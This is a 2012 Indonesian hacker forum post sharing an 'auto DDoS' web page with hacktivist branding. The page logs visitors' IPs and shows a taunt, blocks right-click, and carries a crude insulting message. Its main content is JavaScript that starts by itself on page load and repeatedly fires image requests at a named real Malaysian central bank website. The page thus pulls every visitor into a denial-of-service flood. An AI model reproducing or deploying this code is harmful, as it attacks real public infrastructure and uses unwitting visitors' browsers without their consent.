- Code:
<script language="JavaScript1.2">
function ClearError() {return true;}
window.onerror = ClearError;
</script>
<br>
<div align="center"><table border="0" width="70%"><tr><td>
<h1><font face="Bradley Hand ITC"><center><SCRIPT>
farbbibliothek = new Array();
farbbibliothek[0] = new Array("#FF0000","#FF1100","#FF2200","#FF3300","#FF4400","#FF5500","#FF6600","#FF7700","#FF8800","#FF9900","#FFaa00","#FFbb00","#FFcc00","#FFdd00","#FFee00","#FFff00","#FFee00","#FFdd00","#FFcc00","#FFbb00","#FFaa00","#FF9900","#FF8800","#FF7700","#FF6600","#FF5500","#FF4400","#FF3300","#FF2200","#FF1100");
farbbibliothek[1] = new Array("#FF0000","#FFFFFF","#FFFFFF","#FF0000");
farbbibliothek[2] = new Array("#FFFFFF","#FF0000","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF");
farbbibliothek[3] = new Array("#FF0000","#FF4000","#FF8000","#FFC000","#FFFF00","#C0FF00","#80FF00","#40FF00","#00FF00","#00FF40","#00FF80","#00FFC0","#00FFFF","#00C0FF","#0080FF","#0040FF","#0000FF","#4000FF","#8000FF","#C000FF","#FF00FF","#FF00C0","#FF0080","#FF0040");
farbbibliothek[4] = new Array("#FF0000","#EE0000","#DD0000","#CC0000","#BB0000","#AA0000","#990000","#880000","#770000","#660000","#550000","#440000","#330000","#220000","#110000","#000000","#110000","#220000","#330000","#440000","#550000","#660000","#770000","#880000","#990000","#AA0000","#BB0000","#CC0000","#DD0000","#EE0000");
farbbibliothek[5] = new Array("#FF0000","#FF0000","#FF0000","#FFFFFF","#FFFFFF","#FFFFFF");
farbbibliothek[6] = new Array("#FF0000","#FDF5E6");
farben = farbbibliothek[4];
function farbschrift()
{
for(var i=0 ; i<Buchstabe.length; i++)
{
document.all["a"+i].style.color=farben[i];
}
farbverlauf();
}
function string2array(text)
{
Buchstabe = new Array();
while(farben.length<text.length)
{
farben = farben.concat(farben);
}
k=0;
while(k<=text.length)
{
Buchstabe[k] = text.charAt(k);
k++;
}
}
function divserzeugen()
{
for(var i=0 ; i<Buchstabe.length; i++)
{
document.write("<span id='a"+i+"' class='a"+i+"'>"+Buchstabe[i] + "</span>");
}
farbschrift();
}
var a=1;
function farbverlauf()
{
for(var i=0 ; i<farben.length; i++)
{
farben[i-1]=farben[i];
}
farben[farben.length-1]=farben[-1];
setTimeout("farbschrift()",30);
}
//
var farbsatz=1;
function farbtauscher()
{
farben = farbbibliothek[farbsatz];
while(farben.length<text.length)
{
farben = farben.concat(farben);
}
farbsatz=Math.floor(Math.random()*(farbbibliothek.length-0.0001));
}
setInterval("farbtauscher()",9000);
text ="INDONESIA FIGHTER CYBER WAS HERE";//h
string2array(text);
divserzeugen();
[You must be registered and logged in to see this link.]
</SCRIPT></center></h1></font>
<html>
<head>
<link rel="SHORTCUT ICON" href="http://i48.servimg.com/u/f48/16/08/07/74/indone10.gif">
</head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<title>Girilaya - Mandala Putra Dwi Admaja</title>
</head>
<body text="#FF0000" bgcolor="#000000" background="http://i1268.photobucket.com/albums/jj575/antonio12324/kilat1-1.gif"><META NAME="description" CONTENT="mandala putra dwi admaja>
<meta NAME="keywords" CONTENT="HACKER SAKIT HATI">
<body bgcolor="black" text="white">
<script type="text/javascript"> TypingText = function(element, interval, cursor, finishedCallback) { if((typeof document.getElementById == "undefined") || (typeof element.innerHTML == "undefined")) { this.running = true; return; } this.element = element; this.finishedCallback = (finishedCallback ? finishedCallback : function() { return; }); this.interval = (typeof interval == "undefined" ? 100 : interval); this.origText = this.element.innerHTML; this.unparsedOrigText = this.origText; this.cursor = (cursor ? cursor : ""); this.currentText = ""; this.currentChar = 0; this.element.typingText = this; if(this.element.id == "") this.element.id = "typingtext" + TypingText.currentIndex++; TypingText.all.push(this); this.running = false; this.inTag = false; this.tagBuffer = ""; this.inHTMLEntity = false; this.HTMLEntityBuffer = "";}TypingText.all = new Array();TypingText.currentIndex = 0;TypingText.runAll = function() { for(var i = 0; i < TypingText.all.length; i++) TypingText.all[i].run();}TypingText.prototype.run = function() { if(this.running) return; if(typeof this.origText == "undefined") { setTimeout("document.getElementById('" + this.element.id + "').typingText.run()", this.interval); return; } if(this.currentText == "") this.element.innerHTML = ""; if(this.currentChar < this.origText.length) { if(this.origText.charAt(this.currentChar) == "<" && !this.inTag) { this.tagBuffer = "<"; this.inTag = true; this.currentChar++; this.run(); return; } else if(this.origText.charAt(this.currentChar) == ">" && this.inTag) { this.tagBuffer += ">"; this.inTag = false; this.currentText += this.tagBuffer; this.currentChar++; this.run(); return; } else if(this.inTag) { this.tagBuffer += this.origText.charAt(this.currentChar); this.currentChar++; this.run(); return; } else if(this.origText.charAt(this.currentChar) == "&" && !this.inHTMLEntity) { this.HTMLEntityBuffer = "&"; this.inHTMLEntity = true; this.currentChar++; this.run(); return; } else if(this.origText.charAt(this.currentChar) == ";" && this.inHTMLEntity) { this.HTMLEntityBuffer += ";"; this.inHTMLEntity = false; this.currentText += this.HTMLEntityBuffer; this.currentChar++; this.run(); return; } else if(this.inHTMLEntity) { this.HTMLEntityBuffer += this.origText.charAt(this.currentChar); this.currentChar++; this.run(); return; } else { this.currentText += this.origText.charAt(this.currentChar); } this.element.innerHTML = this.currentText; this.element.innerHTML += (this.currentChar < this.origText.length - 1 ? (typeof this.cursor == "function" ? this.cursor(this.currentText) : this.cursor) : ""); this.currentChar++; setTimeout("document.getElementById('" + this.element.id + "').typingText.run()", this.interval); } else { this.currentText = ""; this.currentChar = 0; this.running = false; this.finishedCallback(); }}</script>
<body oncontextmenu="return false" onselectstart="return false" onafterprint="onafterprint()" onbeforeprint="onbeforeprint()" leftmargin="0" topmargin="0" onLoad="teclear();" style="background-color: rgb(0, 0, 0);">
<center><b><font size="7"> </big>
<center><SCRIPT language=JavaScript>
<!----------
var delay=100;
var currentChar=1;
var destination="";
function type()
{
if (document.getElementById)
{
var dest=document.getElementById(destination);
if (dest)
{
dest.innerHTML=text.substr(0, currentChar);
currentChar++
if (currentChar>text.length)
{
setTimeout("type()", delay);
}
else
{
setTimeout("type()", delay);
}
}
}
}
function startTyping(textParam, delayParam, destinationParam)
{
text=textParam;
delay=delayParam;
currentChar=1;
destination=destinationParam;
type();
}
//
function FP_popUpMsg(msg) {//v1.0
alert(msg);
}
-->
</SCRIPT>
<P align=center>
<DIV id=textDestination>...</DIV>
<P align=center>
<SCRIPT language=JavaScript>
<!--
startTyping(text, 40, "textDestination");
//-->
</SCRIPT>
</center>
<center>
<script language="JavaScript">
VIH_BackColor = "transparent";
VIH_ForeColor = "Red";
VIH_FontPix = "16";
VIH_DisplayFormat = "Information We Got:<br>Ur IP Address: %%IP%%<br>Host: %%HOST%%";
VIH_DisplayOnPage = "yes";
</script>
<script language="JavaScript" src="http://scripts.hashemian.com/js/visitorIPHOST.js.php"></script>
<br>
</P></body>
</html>
<br>
<style type="text/css">#cot_tl_fixed{background-color:Black;position:fixed;bottom:0px;font-size:22px;left:0px;padding:4px 0;clip:_top:expression(document.documentElement.scrollTop+document.documentElement.clientHeight-this.clientHeight);_left:expression(document.documentElement.scrollLeft + document.documentElement.clientWidth - offsetWidth);}</style>
<span style="color: #FFFFFF;">
<div id="cot_tl_fixed"><marquee><font class="whiteglow"><font color='white' face='tahoma'><b> Thanks To : | mandala putra dwi admaja | Girilaya </b></b></font></font></marquee>
<br>
<script language="Javascript1.2">
var mymessage = "IP Address Logged :P soon we 'll be coming ";
function rtclickcheck(keyp){
if (navigator.appName == "Netscape" && keyp.which == 3) {
alert(mymessage);
return false;
}
if (navigator.appVersion.indexOf("MSIE") != -1 && event.button == 2) {
alert(mymessage);
return false;
}
}
document.onmousedown = rtclickcheck
//-->
</script>
<head>
<style>
.shakeimage{
position:relative
}
</style>
margin-right: 15%;
font-family:"Courier New", Courier, monospace;
color: #808080;
}
fieldset {
border-style: none;
margin: 10px;
}
p {
margin: 0;
}
input {
margin: 0;
background-color: transparent;
border: none;
text-align: center;
font-family:"Courier New", Courier, monospace;
color: #808080;
}
</style>
<script language="JavaScript">
<!-- Disable
function disableselect(e){
return false
}
function reEnable(){
return true
}
//if IE4+
document.onselectstart=new Function ("return false")
document.oncontextmenu=new Function ("return false")
//if NS6
if (window.sidebar){
document.onmousedown=disableselect
document.onclick=reEnable
}
//-->
</script>
</head>
<body onLoad="type()">
<fieldset>
<div id="title" align="center"><font size="+3" color="#FF0000">[#</font><font size="+3">IFC</font><font size="+3" color="#FF0000">] -- [</font><font size="+3">INDONESIA FIGHTER CYBER</font><font size="+3" color="#FF0000">]</font></div><br><br>
<div id="hive" align="center">
<font color="#FF0000">[</font>TARGET<font color="#FF0000">]</font><br>
<input name="target" id="target" size="100" value="http://www.bnm.gov.my/"><br><br>
<font color="#FF0000">[</font>REQUESTS<font color="#FF0000">]</font><br>
<input id="requests" size="100" value="50000"><br><br>
<font color="#FF0000">[</font>MESSAGE<font color="#FF0000">]</font><br>
<input id="message" size="100" value="Datang ndak DiUndang . . Pulang Bawa Perawan"><br><br>
<font color="#FF0000">[</font>STATUS<font color="#FF0000">]</font><br>
REQUESTS <p id="requested">0</p>
SUCCEDED <p id="succeeded">0</p>
FAILED <p id="failed">0</p><br>
<button id="fire" style="background-color:#000000; border-color: rgb(255, 255, 255); color: rgb(255, 255, 255);"> STOP! </button><br><br><br>
</div>
<script>
(function () {
var fireInterval;
var isFiring = false;
var currentTime = new Date();
var lastSuccess = currentTime.getTime();
var requestedNode = document.getElementById("requested"),
succeededNode = document.getElementById("succeeded"),
failedNode = document.getElementById("failed"),
targetNode = document.getElementById("target"),
fire = document.getElementById("fire"),
messageNode = document.getElementById("message"),
requestsNode = document.getElementById("requests"),
timeoutNode = document.getElementById("timeout");
var target = targetNode.value;
targetNode.onchange = function () {
target = this.value;
};
var requestsHT = {};
var requested = 0,
succeeded = 0,
failed = 0;
var makeHttpRequest = function () {
if ( (currentTime.getTime()-lastSuccess) > 100000000) {
return;
} else {
lastSuccess = currentTime.getTime();
};
var rID =Number(new Date());
var img = new Image();
img.onerror = function () { onFail(rID); };
img.onabort = function () { onFail(rID); };
img.onload = function () { onSuccess(rID); };
img.setAttribute("src", target + "?id=" + rID + "&msg=" + messageNode.value);
requestsHT[rID] = img;
onRequest(rID);
};
var onRequest = function (rID) {
requested++;
requestedNode.innerHTML = requested;
};
var onComplete = function (rID) {
delete requestsHT[rID];
};
var onFail = function (rID) {
// failedCtr++;
[You must be registered and logged in to see this link.] = failedCtr;
succeeded++; //Seems like the url will always fail it it isn't an image
succeededNode.innerHTML = succeeded;
delete requestsHT[rID];
};
var onSuccess = function (rID) {
succeeded++;
succeededNode.innerHTML = succeeded;
delete requestsHT[rID];
};
fire.onclick = function () {
if (isFiring) {
clearInterval(fireInterval);
isFiring = false;
this.innerHTML = "FIRE!";
} else {
isFiring = true;
this.innerHTML = "STOP!";
fireInterval = setInterval(makeHttpRequest, (50000 / parseInt(requestsNode.value) | 0));
}
};
function start() {
if (isFiring) {
clearInterval(fireInterval);
isFiring = false;
this.innerHTML = "FIRE!";
} else {
isFiring = true;
this.innerHTML = "STOP";
fireInterval = setInterval(makeHttpRequest, (50000 / parseInt(requestsNode.value) | 0));
}
};
document.getElementById("target").value = "http:///www.bnm.gov.my";
start();
})();
</script>
<div id="footer" align="center"><font color="#FF0000"># [</font>WE ARE<font color="#FF0000">] -- [</font>girilaya<font color="#FF0000">] #</font></div>
</fieldset>
<!--scripts-->
<script type="text/javascript">
function meow()
{
}
window.onbeforeunload = function()
{
alert("Maaf...!!");
alert("^_^ ");
alert(":P");
alert("Coba lagi");
alert("http://girilaya.com");
}
1 Script AUTO Ddos Versi #OP Bela Pahlawan Devisa Tue 13 Nov 2012, 22:43
Admin
Admin
Similar topics
Permissions in this forum:
Anda tidak dapat menjawab topik